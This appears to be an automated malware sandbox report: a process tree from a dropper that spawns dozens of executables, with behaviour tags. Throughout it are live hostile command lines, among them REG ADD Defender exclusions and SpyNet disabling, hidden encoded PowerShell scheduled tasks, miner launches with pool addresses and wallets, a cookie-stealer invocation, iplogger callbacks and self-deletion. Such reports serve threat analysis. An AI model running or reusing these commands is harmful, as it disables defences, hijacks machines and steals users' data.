C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,8395511421460651168,13690578033526522605,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,8395511421460651168,13690578033526522605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 6203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 6283⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 7443⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 8043⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 8283⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 10363⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 10763⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 12443⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 6643⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 10403⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij72⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffe639246f8,0x7ffe63924708,0x7ffe639247183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4020 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5740 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2124 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6412 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1c4,0x22c,0x7ff644795460,0x7ff644795470,0x7ff6447954804⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6412 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1868 /prefetch:23⤵
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Installation.exe"C:\Users\Admin\AppData\Local\Temp\Installation.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\pzyh.exe"C:\Users\Admin\AppData\Local\Temp\pzyh.exe"2⤵
- DcRat
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe"C:\Users\Admin\AppData\Local\Temp\pub2.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\Infos.exe"C:\Users\Admin\AppData\Local\Temp\Infos.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\PWhSdaGNWZZnS8BjtCCZ9pOe.exe"C:\Users\Admin\Documents\PWhSdaGNWZZnS8BjtCCZ9pOe.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\IDgzLzkXcK21aBlMOtzETzcZ.exe"C:\Users\Admin\Documents\IDgzLzkXcK21aBlMOtzETzcZ.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 4604⤵
- Program crash
-
C:\Users\Admin\Documents\zIlVU7ZogqbWpTqmVJGYv0Hh.exe"C:\Users\Admin\Documents\zIlVU7ZogqbWpTqmVJGYv0Hh.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4940 -s 4724⤵
- Program crash
-
C:\Users\Admin\Documents\apIafuakphKdmwhIYaWc_mP4.exe"C:\Users\Admin\Documents\apIafuakphKdmwhIYaWc_mP4.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\odt\gtGhkMGggyQ8QkD_Z3jVqai0.exe"C:\odt\gtGhkMGggyQ8QkD_Z3jVqai0.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\LJJlylsdlerbUUgUBlj_im4E.exe"C:\Users\Admin\Documents\LJJlylsdlerbUUgUBlj_im4E.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\Ei8DrAmaYu9K8ghN89Cs.exe"C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\Ei8DrAmaYu9K8ghN89Cs.exe"4⤵
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool wss://eu1.stratum.ton-pool.com/stratum --user UQBoMIYmX6zYTKyRLaph1PjCMfxSLWTbiAw_qqTHLnbMhzWF5⤵
-
C:\Windows\notepad.exeC:\Windows\notepad.exe --coin=XMR -o xmr-eu1.nanopool.org:14444 -u 44W9eLcymm66Eie5AyD11jYW1DaJ4GTHzZEu1QELPGS3U9vKtWEyUCaCFwhn4af8zjeQ2MWeuLgCVDTjAjiGUbyYAtQBvC1 -p 10k instllov5⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5196 -s 4406⤵
- Program crash
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "new" "ton"5⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1372 -s 2686⤵
- Program crash
-
C:\Users\Admin\Documents\VFoNhG_Zeh0WXQxnBSFaZqAE.exe"C:\Users\Admin\Documents\VFoNhG_Zeh0WXQxnBSFaZqAE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 4604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 4684⤵
- Program crash
-
C:\Users\Admin\Documents\e8ds_0qOcrUahz4Yjq0aLvxh.exe"C:\Users\Admin\Documents\e8ds_0qOcrUahz4Yjq0aLvxh.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\1eb3a752-4420-4367-bdec-0407d20e9dc0.exe"C:\Users\Admin\AppData\Local\Temp\1eb3a752-4420-4367-bdec-0407d20e9dc0.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\j9JoI22bTxWmSEp1Dm9hS1RV.exe"C:\Users\Admin\Documents\j9JoI22bTxWmSEp1Dm9hS1RV.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\j9JoI22bTxWmSEp1Dm9hS1RV.exe4⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 05⤵
-
C:\Users\Admin\Documents\6WoEM1C6fgCRhgUAcZHi2POU.exe"C:\Users\Admin\Documents\6WoEM1C6fgCRhgUAcZHi2POU.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 6244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 6324⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 6684⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 6484⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 7884⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 12724⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 12804⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "6WoEM1C6fgCRhgUAcZHi2POU.exe" /f & erase "C:\Users\Admin\Documents\6WoEM1C6fgCRhgUAcZHi2POU.exe" & exit4⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "6WoEM1C6fgCRhgUAcZHi2POU.exe" /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 13884⤵
- Program crash
-
C:\Users\Admin\Documents\gtGhkMGggyQ8QkD_Z3jVqai0.exe"C:\Users\Admin\Documents\gtGhkMGggyQ8QkD_Z3jVqai0.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Wsctpfnlhslasrsaigeprim.exe"C:\Users\Admin\AppData\Local\Temp\Wsctpfnlhslasrsaigeprim.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe4⤵
-
C:\Users\Admin\Documents\3pobJdeTncHRVAMa5wc46se6.exe"C:\Users\Admin\Documents\3pobJdeTncHRVAMa5wc46se6.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\BDJG9.exe"C:\Users\Admin\AppData\Local\Temp\BDJG9.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7EEH0.exe"C:\Users\Admin\AppData\Local\Temp\7EEH0.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7I4LD.exe"C:\Users\Admin\AppData\Local\Temp\7I4LD.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\9KGM4.exe"C:\Users\Admin\AppData\Local\Temp\9KGM4.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\76G9I.exe"C:\Users\Admin\AppData\Local\Temp\76G9I.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",5⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",6⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",8⤵
-
C:\Users\Admin\AppData\Local\Temp\76G9IJMD201BBH1.exehttps://iplogger.org/1nChi74⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\drecFYoUAZwZKDsRAB33WXoF.exe"C:\Users\Admin\Documents\drecFYoUAZwZKDsRAB33WXoF.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zS362C.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zS4FFD.tmp\Install.exe.\Install.exe /S /site_id "525403"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnsfbOmOW" /SC once /ST 13:42:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gnsfbOmOW"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gnsfbOmOW"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 19:31:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\PyYIOdR.exe\" j6 /site_id 525403 /S" /V1 /F6⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\V0CoOL90dCA2Fs9BKr5ffDlp.exe"C:\Users\Admin\Documents\V0CoOL90dCA2Fs9BKr5ffDlp.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im V0CoOL90dCA2Fs9BKr5ffDlp.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\V0CoOL90dCA2Fs9BKr5ffDlp.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im V0CoOL90dCA2Fs9BKr5ffDlp.exe /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\8yPhCVbCi1c8XIP1eciLPkHT.exe"C:\Users\Admin\Documents\8yPhCVbCi1c8XIP1eciLPkHT.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\UxHD8WD6JzNKv1lcW6m7Keaj.exe"C:\Users\Admin\Documents\UxHD8WD6JzNKv1lcW6m7Keaj.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\o7QhAXhuoJQjnxTdsdJdasfg.exe"C:\Users\Admin\Documents\o7QhAXhuoJQjnxTdsdJdasfg.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\jmgtfwUdHp9OjWiA1hv55jGD.exe"C:\Users\Admin\Documents\jmgtfwUdHp9OjWiA1hv55jGD.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\PdMWUMUBDQaqgneMz4NAMEXR.exe"C:\Users\Admin\Documents\PdMWUMUBDQaqgneMz4NAMEXR.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\NmgYea8Ed5HpZgfZ6I_SyvV4.exe"C:\Users\Admin\Documents\NmgYea8Ed5HpZgfZ6I_SyvV4.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4972 -ip 49721⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 6083⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4972 -ip 49721⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4332 -ip 43321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4972 -ip 49721⤵
